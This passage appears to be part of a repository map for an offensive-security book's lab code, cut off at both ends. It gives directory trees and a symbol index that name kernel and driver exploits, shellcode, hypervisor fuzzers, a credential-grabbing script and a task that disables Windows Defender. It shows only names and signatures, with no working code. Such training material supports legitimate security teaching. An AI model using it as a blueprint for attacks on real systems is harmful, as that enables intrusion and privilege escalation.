│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── get-ips.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch16/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch16_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── passwords.txt
├── ch17/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch17_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── Run-SDProp.ps1
├── ch18/
│ ├── name
│ ├── name2
│ └── test
├── ch19/
│ ├── lab-19-1/
│ │ └── README.txt
│ ├── lab-19-2/
│ │ ├── README.txt
│ │ ├── facet-search.py
│ │ ├── install.sh
│ │ └── mqtt-search.py
│ └── lab-19-3/
│ ├── README.txt
│ └── mqtt-scan.py
├── ch21/
│ ├── lab-21-1/
│ │ ├── README.txt
│ │ └── lab-21-1.sh
│ ├── lab-21-2/
│ │ ├── lab-21-2.sh
│ │ └── ssi
│ ├── lab-21-3/
│ │ └── README.txt
│ ├── lab-21-4/
│ │ └── README.txt
│ └── lab-21-5/
│ └── README.txt
├── ch22/
│ ├── Analyze/
│ │ ├── README.txt
│ │ ├── cmds.txt
│ │ ├── decode-inspectrum.py
│ │ └── install.sh
│ ├── Capture/
│ │ ├── README.txt
│ │ ├── remote1-1off-4m-316mhz
│ │ ├── remote1-1on-4m-316mhz
│ │ ├── remote1-2off-4m-316mhz
│ │ ├── remote1-2on-4m-316mhz
│ │ ├── remote1-3off-4m-316mhz
│ │ ├── remote1-3on-4m-316mhz
│ │ ├── remote2-1off-4m-316mhz
│ │ ├── remote2-1on-4m-316mhz
│ │ ├── remote2-2off-4m-316mhz
│ │ ├── remote2-2on-4m-316mhz
│ │ ├── remote2-3off-4m-316mhz
│ │ ├── remote2-3on-4m-316mhz
│ │ └── remote_analysis.grc
│ ├── Execute/
│ │ ├── README.txt
│ │ └── test-execute.grc
│ ├── Preview/
│ │ ├── README.txt
│ │ └── test-preview.grc
│ └── Replay/
│ ├── README.txt
│ └── remote_analysis_replay.grc
├── ch24/
│ ├── Dockerfile
│ ├── README.md
│ └── labs/
│ ├── lab1/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ └── main.c
│ ├── lab2/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── protocol.c
│ │ └── protocol.h
│ ├── lab3/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ └── protocol.py
│ ├── lab4/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab5/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── multiboot2.h
│ │ ├── port_fuzzer.py
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab6/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── msr_fuzzer.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ └── lab7/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── fuzzer.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── msr_fuzzer.py
│ ├── multiboot2.h
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ └── remotemem.py
├── ch25/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── guest.py
│ ├── hypercall.py
│ ├── hyperv_guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── remotemem.py
│ ├── session.py
│ ├── time_sync.py
│ └── vmbus.py
├── ch26/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── cstruct.py
│ ├── ehci.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── qemu_guest.py
│ ├── qemu_xpl.py
│ ├── remotemem.py
│ ├── session.py
│ └── trigger.py
├── ch27/
│ ├── README.md
│ └── lab/
│ ├── ansible/
│ │ ├── ansible.cfg
│ │ ├── ch27_playbook.yml
│ │ ├── roles/
│ │ │ ├── common/
│ │ │ │ └── default/
│ │ │ │ └── main.yml
│ │ │ ├── kali_customizations/
│ │ │ │ ├── files/
│ │ │ │ │ └── getEC2WinCreds.py
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── victim1/
│ │ │ └── tasks/
│ │ │ └── main.yml
│ │ └── vars/
│ │ ├── users.yml
│ │ └── vars.yml
│ ├── apps/
│ │ └── webapp/
│ │ └── index.js
│ ├── build.sh
│ ├── destroy.sh
│ ├── terraform/
│ │ ├── data.tf
│ │ ├── documents/
│ │ │ └── perform_healthcheck.yml
│ │ ├── ec2.tf
│ │ ├── iam.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── s3.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── terraform2/
│ ├── build2.sh
│ ├── data.tf
│ ├── destroy2.sh
│ ├── ec2.tf
│ ├── inventory.tmpl
│ ├── main.tf
│ ├── output.tf
│ ├── variables.tf
│ └── vpc.tf
├── ch28/
│ ├── Metasploit.md
│ └── get_managed_id.ps1
├── ch29/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch29_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ └── defaults/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── docker/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── daemon.json
│ │ │ │ │ │ └── override.conf
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── kali_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── easy/
│ │ │ └── Dockerfile
│ │ ├── nmap/
│ │ │ ├── Dockerfile
│ │ │ └── output/
│ │ │ └── test
│ │ ├── targets/
│ │ │ ├── docker-compose.yml
│ │ │ └── web/
│ │ │ ├── .dockerignore
│ │ │ ├── .gitignore
│ │ │ ├── Dockerfile
│ │ │ ├── app.py
│ │ │ ├── requirements.txt
│ │ │ └── templates/
│ │ │ ├── base.html
│ │ │ └── index.html
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── README.md
└── ch30/
├── Lab/
│ ├── .gitignore
│ ├── badperms.yml
│ ├── build.sh
│ ├── container.yml
│ ├── destroy.sh
│ ├── eksctl.yml
│ ├── ncat-svc.yml
│ └── ncat.yml
└── README.md
SYMBOL INDEX (1168 symbols across 136 files)
FILE: ch02/fmt_str.c
function main (line 3) | int main(void){
FILE: ch02/hello.c
function main (line 3) | int main(){ // required main function
FILE: ch02/ifelse.c
function main (line 3) | int main(void){
FILE: ch02/meet.c
function greeting (line 4) | void greeting(char *temp1,char *temp2){ // greeting function to say hello
function main (line 9) | int main(int argc, char * argv[]){ // note the format for arguments
FILE: ch02/memory.c
function funct1 (line 8) | void funct1(int c){ // bracket starts function1 block with argument (c)
function main (line 14) | void main (){ // the required main function
FILE: ch02/while_ex.c
function main (line 3) | int main(void){
FILE: ch03/heapme_demo.c
function main (line 9) | int main() {
FILE: ch03/hello.c
function main (line 4) | int main() {
FILE: ch03/leak-bof.c
function vuln (line 5) | void vuln() {
function main (line 12) | int main(int argc, char **argv) {
FILE: ch04/students-patched.c
type Student (line 6) | typedef struct {
function LoadStudents (line 16) | void LoadStudents() {
function ListStudents (line 35) | void ListStudents() {
function ViewStudentGrades (line 42) | int ViewStudentGrades() {
function ChangeStudentGrades (line 55) | void ChangeStudentGrades() {
function main (line 75) | void main(void) {
FILE: ch04/students.c
type Student (line 6) | typedef struct {
function LoadStudents (line 16) | void LoadStudents() {
function ListStudents (line 35) | void ListStudents() {
function ViewStudentGrades (line 42) | int ViewStudentGrades() {
function ChangeStudentGrades (line 57) | void ChangeStudentGrades() {
function main (line 77) | void main(void) {
FILE: ch05/myAtoi.c
function myAtoi (line 4) | int myAtoi(char *str){
function main (line 11) | int main(){
FILE: ch05/myProg.c
function func1 (line 5) | int func1(char* input)
function main (line 15) | int main(int argc, char* argv[])
FILE: ch10/getenv.c
function main (line 6) | int main() {
FILE: ch10/meet.c
function greeting (line 4) | void greeting(char *temp1,char *temp2){ // greeting function to say hello
function main (line 9) | int main(int argc, char * argv[]){ // note the format for arguments
FILE: ch10/overflow.c
function main (line 3) | int main(){
FILE: ch10/shellcode.c
function main (line 10) | int main() { //main function
FILE: ch10/smallbuff.c
function main (line 3) | int main(int argc, char * argv[]){
FILE: ch11/exploit2.py
function exploit (line 8) | def exploit(payload, interactive=False):
function leak_bytes (line 25) | def leak_bytes(payload, name):
FILE: ch11/exploit3-v2.py
function exploit (line 9) | def exploit(payload, interactive=False, leak=False):
function leak_bytes (line 29) | def leak_bytes(payload, name):
FILE: ch11/exploit3.py
function exploit (line 9) | def exploit(payload, interactive=False, leak=False):
function leak_bytes (line 29) | def leak_bytes(payload, name):
FILE: ch11/exploit4.py
function exploit (line 9) | def exploit(payload, interactive=False, leak=False):
function leak_bytes (line 29) | def leak_bytes(payload, name):
FILE: ch11/vuln.c
function auth (line 18) | int auth(int connfd) {
function main (line 29) | int main(void) {
FILE: ch12/shared/exploit1/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function escalate_privileges (line 34) | void escalate_privileges(void){
function main (line 52) | int main() {
FILE: ch12/shared/exploit2/exploit.c
function save_state (line 9) | void save_state(){
function shell (line 21) | void shell(void){
function escalate_privileges (line 33) | void escalate_privileges(void){
function main (line 51) | int main() {
FILE: ch12/shared/exploit3/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function main (line 34) | int main() {
FILE: ch12/shared/exploit4/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function main (line 34) | int main() {
FILE: ch12/shared/exploit5/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function main (line 34) | int main() {
FILE: ch12/shared/leak.c
function main (line 7) | int main() {
FILE: ch14/dbutil_exploit.c
type DbMemcpy (line 8) | struct DbMemcpy {
function BOOL (line 16) | BOOL read(HANDLE hdev, ULONG_PTR ptr, DWORD size, LPVOID out) {
function BOOL (line 38) | BOOL write(HANDLE hdev, ULONG_PTR ptr, BYTE* content, DWORD size) {
function BOOL (line 58) | BOOL read_ptr(HANDLE hdev, ULONG_PTR src, ULONG_PTR* out) {
function BOOL (line 62) | BOOL write_ptr(HANDLE hdev, ULONG_PTR dst, ULONG_PTR val) {
function LPVOID (line 66) | LPVOID get_kernel_base() {
function main (line 88) | int main(int argc, char** argv) {
FILE: ch14/dbutil_exploit.py
function errcheck_bool (line 21) | def errcheck_bool(res, func, args):
function errcheck_drivername (line 27) | def errcheck_drivername(res, func, args):
function errcheck_createfile (line 37) | def errcheck_createfile(res, func, args):
function GetProcAddressAbsolute (line 100) | def GetProcAddressAbsolute(hmodule, realbase, symbol):
class DbMemcpy (line 105) | class DbMemcpy(LittleEndianStructure):
function _read (line 111) | def _read(hdev, ptr, size):
function _write (line 123) | def _write(hdev, ptr, contents):
function get_driver_bases (line 129) | def get_driver_bases():
FILE: ch14/dbutil_exploit/src/bin/exploit.rs
constant PID_OFFSET (line 4) | const PID_OFFSET: usize = 0x440;
constant APLINKS_OFFSET (line 5) | const APLINKS_OFFSET: usize = 0x448;
constant TOKEN_OFFSET (line 6) | const TOKEN_OFFSET: usize = 0x4B8;
function main (line 8) | fn main() {
FILE: ch14/dbutil_exploit/src/bin/ioctlcall.rs
function main (line 3) | fn main() {
FILE: ch14/dbutil_exploit/src/lib.rs
type DbMemmove (line 7) | struct DbMemmove {
function open_dev (line 15) | pub unsafe fn open_dev() -> HANDLE {
function ioctl (line 27) | pub unsafe fn ioctl(dev: HANDLE, num: u32, iobuf: PVOID, buflen: usize) ...
function read_ptr (line 40) | pub fn read_ptr(hdev: HANDLE, ptr: usize) -> usize {
function write_ptr (line 54) | pub fn write_ptr(hdev: HANDLE, ptr: usize, content: usize) {
function get_kernel_base (line 67) | pub unsafe fn get_kernel_base() -> usize {
FILE: ch14/ioctlcall.py
function errcheck_bool (line 9) | def errcheck_bool(res, func, args):
function errcheck_createfile (line 15) | def errcheck_createfile(res, func, args):
function opendevice (line 48) | def opendevice(dev):
function ioctl (line 56) | def ioctl(hdev, ioctl, input, outbuf_len):
function _buf_or_stdin (line 69) | def _buf_or_stdin(arg):
FILE: ch19/lab-19-2/facet-search.py
function shodan_search (line 4) | def shodan_search():
FILE: ch19/lab-19-2/mqtt-search.py
function shodan_search (line 3) | def shodan_search():
FILE: ch19/lab-19-3/mqtt-scan.py
function on_connect (line 3) | def on_connect(client, userdata, flags, rc):
function on_message (line 7) | def on_message(client, userdata, msg):
FILE: ch22/Analyze/decode-inspectrum.py
function decode (line 6) | def decode(pfx,thresh,symbols):
FILE: ch24/labs/lab1/common.c
function outb (line 9) | static void outb(uint16_t port, uint8_t val) {
function inb (line 13) | static uint8_t inb(uint16_t port) {
function setup_serial (line 19) | void setup_serial() {
function write_serial (line 29) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 39) | void read_serial(void *data, unsigned long len) {
FILE: ch24/labs/lab1/main.c
function kmain (line 7) | void kmain() {
FILE: ch24/labs/lab2/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab2/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab2/main.c
function kmain (line 8) | void kmain() {
FILE: ch24/labs/lab2/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab2/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab3/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab3/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab3/guest.py
class Guest (line 7) | class Guest:
method __init__ (line 8) | def __init__(self):
method __enter__ (line 11) | def __enter__(self):
method __exit__ (line 18) | def __exit__(self, type, value, traceback):
method messages (line 21) | def messages(self):
FILE: ch24/labs/lab3/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab3/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab3/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab3/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab3/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab4/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab4/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab4/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab4/guest.py
